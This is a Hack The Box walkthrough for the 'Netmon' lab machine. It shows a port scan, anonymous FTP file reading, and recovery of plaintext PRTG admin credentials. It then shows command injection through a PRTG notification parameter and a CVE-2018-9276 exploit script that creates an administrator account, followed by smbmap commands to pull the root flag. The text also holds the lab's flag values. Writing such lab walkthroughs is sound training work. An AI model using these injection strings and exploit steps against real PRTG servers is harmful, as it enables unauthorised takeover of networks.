---
title: "Hack The Box - Netmon"
date: 2019-05-14
tags:
  - htb
---

Exploit notification form in PRTG Network Monitor.

## Description

- Name: `Netmon`
- IP : `10.10.10.152`
- Author : `mrb3n`
- Difficulty : `3.1/10`

## Discovery

`sudo nmap -sV -sC -v -A -T4 -p- 10.10.10.152 -oA scan`

```
Nmap scan report for 10.10.10.152
Host is up (0.040s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=5/10%OT=21%CT=1%CU=35098%PV=Y%DS=2%DC=T%G=Y%TM=5CD5821
OS:6%P=x86_64-unknown-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%II=I%TS=A)SEQ(SP=1
OS:05%GCD=1%ISR=10A%CI=RD%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10A%TS=9)OPS(O1=M5
OS:4DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O
OS:6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%D
OS:F=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=
OS:Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z
OS:)

TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 21s, deviation: 0s, median: 20s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-05-10 15:52:38
|_  start_date: 2019-05-10 15:30:02
```

## Pwn User

We can see that the ftp permits the anonymous login and that the root of the ftp server is `C:\`, so we can read the flag stored in `C:\Users\Public\user.txt` using ftp (_port 21_).

## Pwn Root

The index of the website on the port `80` is a `PRTG Network Monitor` login page :

![](./login-page.png)

And we can see in the bottom right that there's the version of the software : `18.1.36.1396`. Searching on duckduckgo for some vulnerabilities related to this version I found this [link](https://www.paessler.com/about-prtg-17-4-35-through-18-1-37) that shows that in the version of `PRTG` between `17.4.35` and `18.1.37` the credentials were stored in plain in text in a **log** file in the `ProgramData` directory.
We can download all the files in the `C:\ProgramData\Paessler\PRTG Network Monitor` using ftp and after some search using `grep` or `vim` we can find that the password is in the `PRTG Configuration.old.bak` with the username `prtgadmin`.

Credentials:

username : `prtgadmin`

password : `PrTg@dmin2018`

However the password is not valid anymore because the file was from 2018 and we are in 2019, but if we change it from `PrTg@dmin2018` to `PrTg@dmin2019` we can login into the site.

![](./web-site.png)

We can now go in `setup->notifications` and add a new notification which executes a `ps1` script that is located in : `C:\Program Files (x86)\PRTG Network Monitor\Notifications\EXE`. If we go with ftp into that directory we can see that there are two files :

```
12-14-17  01:40PM                  534 Demo EXE Notification - OutFile.bat
12-14-17  01:40PM                  814 Demo EXE Notification - OutFile.ps1
```

Because powershell is more flexible than a bat script is better to download first the `Demo EXE Notification - OutFile.ps1` and check what the script contains.

```ps1
# Demo 'Powershell' Notification for Paessler Network Monitor
# Writes current Date/Time into a File
#
# How to use it:
#
# Create a exe-notification on PRTG, select 'Demo Exe Notifcation - OutFile.ps1' as program,
# The Parametersection consists of one parameter:
#
# - Filename
#
# e.g.
#
#         "C:\temp\test.txt"
#
# Note that the directory specified must exist.
# Adapt Errorhandling to your needs.
# This script comes without warranty or support.


if ($Args.Count -eq 0) {

  #No Arguments. Filename must be specified.

  exit 1;
 }elseif ($Args.Count -eq 1){


  $Path = split-path $Args[0];

  if (Test-Path $Path)
  {
    $Text = Get-Date;
    $Text | out-File $Args[0];
    exit 0;

  }else
  {
    # Directory does not exist.
    exit 2;
  }
}
```

The script writes the current date into the file specified as argument, but if we pass to the argument `test.txt;whoami > "C:\ProgramData\Paessler\nothing.txt"` we can check who is the user that executes the program. If it is `nt authority\system` we can copy the root flag and read it.

### Form to create the notification

![](./whoami.png)

We can now save and click in the `send notification button` :

![](./send-notification.png)

Now we need to use ftp to check if the file has being created.

```
ftp> pwd
257 "/ProgramData/Paessler" is current directory.
ftp> ls -la
200 PORT command successful.
150 Opening ASCII mode data connection.
05-17-19  05:01AM                   44 nothing.txt
05-17-19  04:45AM       <DIR>          PRTG Network Monitor
226 Transfer complete.
ftp> get nothing.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
44 bytes received in 0.0314 seconds (1.37 kbytes/s)
```

Luckily the `nothing.txt` file contains `nt authority\system`. Now what we need to do is to change the argument of the notification that we've just created to : `test.txt; Copy-Item "C:\Users\Administrator\Desktop\root.txt" -Destination "C:\ProgramData\Paessler\nothing.txt`. After saving we can resend the notification and check if the file nothing.txt has been modified. We can download again the file and see that there's the root flag :D.
The last thing to do is to remove the file (maybe other users using ftp can download the file and read the root flag), to do so we have to set in the notification's argument : `test.txt; Remove-Item C:\ProgramData\Paessler\nothing.txt` and resend the notification.

## Pwn Root Alternative

At this point we can check the web service at the address `http://10.10.10.152/index.htm`. From this point we know that in the server is installed `PRTG` which is network monitor program with a previous vulnerability. In fact, after digging a bit, we find out that the program used to stored plain password, using no encryption mechanism. The location where it stores configuration and data is the following `C:\ProgramData/Paessler/PRTG Network Monitor` and the file we are looking for is `Configuration.old.bak`, an old backup.

If we open it, we see that there are the admin credentials:

- User: prtgadmin
- Password: PrTg@dmin2018

Although, logging with those credentials return an error, but it could probably be due to the year in the password. Changing into `PrTg@dmin2019` is the solution!

Now that we are logged, we can kindly use the script [PRTG-Network-Monitor-RCE](https://github.com/M4LV0/PRTG-Network-Monitor-RCE) to create a privileged user thanks to we can connect via smb and retrieve the root flag. Notice that we need to insert as parameter the cookie set by this website (the ones once logged).

```bash
$ ./exploit.sh -u http://10.10.10.152 -c "_gat=1;_ga=GA1.4.1712618639.1561191196;_gid=GA1.4.836181370.1561191196;OCTOPUS1813713946=e0Y4NjFFMTQ2LTYxNDAtNDIxMS1BNEMyLUJFMzdGN0ZDMTAxMn0%3D"

[+]#########################################################################[+]
[*] PRTG RCE script by M4LV0                                                [*]
[+]#########################################################################[+]
[*] https://github.com/M4LV0                                                [*]
[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution  CVE-2018-9276 [*]
[+]#########################################################################[+]

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and add it to the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'

[+]#########################################################################[+]

 [*] file created
 [*] sending notification wait....

 [*] adding a new user 'pentest' with password 'P3nT3st'
 [*] sending notification wait....

 [*] adding a user pentest to the administrators group
 [*] sending notification wait....


 [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!
```

It seems that everything worked, let's try to list the network disk with smb. For this challenge, we used [smbmap](https://github.com/ShawnDEvans/smbmap).

```bash
$ python smbmap.py -u pentest -p 'P3nT3st!' -d workgroup -H 10.10.10.152
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.152...
[+] IP: 10.10.10.152:445  Name: 10.10.10.152
  Disk                                                    Permissions
  ----                                                    -----------
  ADMIN$                                              READ, WRITE
  C$                                                  READ, WRITE
  IPC$                                                READ ONLY
```

List the desktop of C\$.

```bash
python smbmap.py -u pentest -p 'P3nT3st!' -d workgroup -H 10.10.10.152 -R 'C$\Users\Administrator\Desktop'

[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.152...
[+] IP: 10.10.10.152:445  Name: 10.10.10.152
  Disk                                                    Permissions
  ----                                                    -----------
  C$                                                  READ, WRITE
  .Users\Administrator\Desktop\
  dw--w--w--                0 Sun Feb  3 05:35:23 2019  .
  dw--w--w--                0 Sun Feb  3 05:35:23 2019  ..
  -r--r--r--              282 Sun Feb  3 13:08:38 2019  desktop.ini
  -r--r--r--               33 Sun Feb  3 05:35:24 2019  root.txt
```

And download the root.txt file.

```bash
python smbmap.py -u pentest -p 'P3nT3st!' -d workgroup -H 10.10.10.152 -R 'C$\Users\Administrator\Desktop' --download 'C$\Users\Administrator\Desktop\root.txt'



[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.152...
[+] Starting download: C$\Users\Administrator\Desktop\root.txt (33 bytes)
[+] File output to: /home/s41m0n/Desktop/smbmap/10.10.10.152-C_Users_Administrator_Desktop_root.txt

$ cat 10.10.10.152-C_Users_Administrator_Desktop_root.txt
3018977fb---------------------
```

The root flag has been completely retrieved :)

<!--
## Flag

user : `dd58ce67b49e15105e88096c8d9255a5`

root : `3018977fb944bf1878f75b879fba67cc`
-->

## Resources

https://kb.paessler.com/en/topic/18963-how-can-i-use-powershell-scripts-with-prtg-s-execute-program-notification

https://www.paessler.com/about-prtg-17-4-35-through-18-1-37
